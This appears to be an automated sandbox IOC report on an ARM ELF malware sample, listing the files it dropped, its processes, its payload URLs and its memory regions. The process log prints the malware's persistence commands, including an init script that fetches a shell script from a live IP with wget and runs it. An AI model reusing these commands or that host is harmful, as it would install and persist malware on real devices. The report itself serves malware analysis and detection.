IOC Report
arm.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
arm.nn.elf
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
initial sample
malicious
/etc/init.d/arm.nn.elf
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/mybinary
POSIX shell script, ASCII text executable
dropped
malicious
/etc/profile
ASCII text
dropped
malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.D5Kv2w (deleted)
data
dropped

Processes

Path
Cmdline
Malicious
/tmp/arm.nn.elf
/tmp/arm.nn.elf
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/arm.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mybinary
/tmp/arm.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
/tmp/arm.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"
/tmp/arm.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/arm.nn.elf
/tmp/arm.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/arm.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/tmp/arm.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
There are 86 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://154.216.19.140/curl.sh
unknown
http://154.216.19.140/lol.sh
unknown
http://154.216.19.140/
unknown

Memdumps

Base Address
Regiontype
Protect
Malicious
7fbd2c032000
page execute read
malicious
7fbd2c032000
page execute read
malicious
7fbd2c032000
page execute read
malicious
7fbd2c032000
page execute read
malicious
7fbd2c032000
page execute read
malicious
7fbd2c032000
page execute read
malicious
5604e0ff9000
page read and write
7fbd2c03e000
page read and write
7fbe2c021000
page read and write
7fbe334cb000
page read and write
5604e0072000
page read and write
7fbe34884000
page read and write
7fbe349d1000
page read and write
7fbe346a3000
page read and write
5604dde03000
page execute read
7fbe33d65000
page read and write
7fbe34a16000
page read and write
7fbe344c1000
page read and write
5604e0072000
page read and write
7fbe349d1000
page read and write
5604e005b000
page execute and read and write
7fbe349ad000
page read and write
5604de05d000
page read and write
7fbe344c1000
page read and write
7fbe34332000
page read and write
7fbe34355000
page read and write
7fbd2c04f000
page read and write
5604e0fd3000
page read and write
5604e0fd3000
page read and write
7ffdf3bf3000
page execute read
7fbe34884000
page read and write
7fbe344c1000
page read and write
7fbe349d1000
page read and write
7fbe34355000
page read and write
7fbe34a16000
page read and write
7fbd2c03e000
page read and write
7fbe34a16000
page read and write
7fbe334cb000
page read and write
7ffdf3bf3000
page execute read
7fbe34332000
page read and write
5604e005b000
page execute and read and write
7fbe334cb000
page read and write
7fbe33d65000
page read and write
7fbe34332000
page read and write
5604de05d000
page read and write
7fbd2c03a000
page read and write
7fbe33d65000
page read and write
7ffdf3bf3000
page execute read
7fbe34332000
page read and write
7fbe34884000
page read and write
7fbe334cb000
page read and write
7fbd2c03a000
page read and write
5604e0fd3000
page read and write
7fbe344c1000
page read and write
5604de054000
page read and write
7fbe340c7000
page read and write
7ffdf3b29000
page read and write
7fbe349d1000
page read and write
7fbe346a3000
page read and write
7fbe33d65000
page read and write
5604e0fd3000
page read and write
7fbd2c03a000
page read and write
7fbe340c7000
page read and write
7fbe2bfff000
page read and write
5604de05d000
page read and write
7ffdf3b29000
page read and write
7fbe340c7000
page read and write
7fbd2c03e000
page read and write
7fbe346a3000
page read and write
7fbe34884000
page read and write
7fbe34355000
page read and write
7fbe349ad000
page read and write
7fbe34a16000
page read and write
7fbe344c1000
page read and write
7fbe34a16000
page read and write
5604e005b000
page execute and read and write
5604e0fd3000
page read and write
7fbe344c1000
page read and write
7fbe2bfff000
page read and write
7ffdf3b29000
page read and write
7fbe2c021000
page read and write
5604dde03000
page execute read
5604dde03000
page execute read
7fbe340c7000
page read and write
7fbd2c03e000
page read and write
7ffdf3bf3000
page execute read
7fbe2c021000
page read and write
7fbe33cd3000
page read and write
5604de054000
page read and write
7fbe340c7000
page read and write
7fbe349ad000
page read and write
5604de05d000
page read and write
7ffdf3b29000
page read and write
7fbd2c03a000
page read and write
5604e0ff9000
page read and write
7fbe340c7000
page read and write
5604e005b000
page execute and read and write
7fbe34355000
page read and write
7ffdf3b29000
page read and write
5604e0ff9000
page read and write
7fbe2bfff000
page read and write
7fbe2bfff000
page read and write
7fbe349d1000
page read and write
7fbe33d65000
page read and write
7fbd2c03a000
page read and write
7ffdf3bf3000
page execute read
7fbe349ad000
page read and write
7fbe33cd3000
page read and write
7fbe34884000
page read and write
5604e0ff9000
page read and write
5604dde03000
page execute read
5604e005b000
page execute and read and write
7fbe346a3000
page read and write
7fbe34355000
page read and write
5604de054000
page read and write
7fbd2c044000
page read and write
5604e0072000
page read and write
7fbe2c021000
page read and write
7fbe2bfff000
page read and write
7fbe33cd3000
page read and write
7fbd2c03e000
page read and write
7fbe34332000
page read and write
7fbe33d65000
page read and write
5604e0fd3000
page read and write
7fbe33cd3000
page read and write
5604de05d000
page read and write
5604dde03000
page execute read
7ffdf3b29000
page read and write
7fbe2bfff000
page read and write
5604e0072000
page read and write
7ffdf3bf3000
page execute read
5604de05d000
page read and write
7fbe349ad000
page read and write
7fbe346a3000
page read and write
5604e0072000
page read and write
5604de054000
page read and write
7fbe334cb000
page read and write
7fbe334cb000
page read and write
5604de054000
page read and write
7fbe2c021000
page read and write
7fbe349ad000
page read and write
7fbe33cd3000
page read and write
7fbd2c03e000
page read and write
5604dde03000
page execute read
7fbe33cd3000
page read and write
7fbe34355000
page read and write
5604e0072000
page read and write
7fbe34332000
page read and write
7fbe34a16000
page read and write
7fbe34884000
page read and write
5604e005b000
page execute and read and write
7fbe2c021000
page read and write
7fbe349d1000
page read and write
7fbd2c03a000
page read and write
7fbe346a3000
page read and write
5604de054000
page read and write
There are 146 hidden memdumps, click here to show them.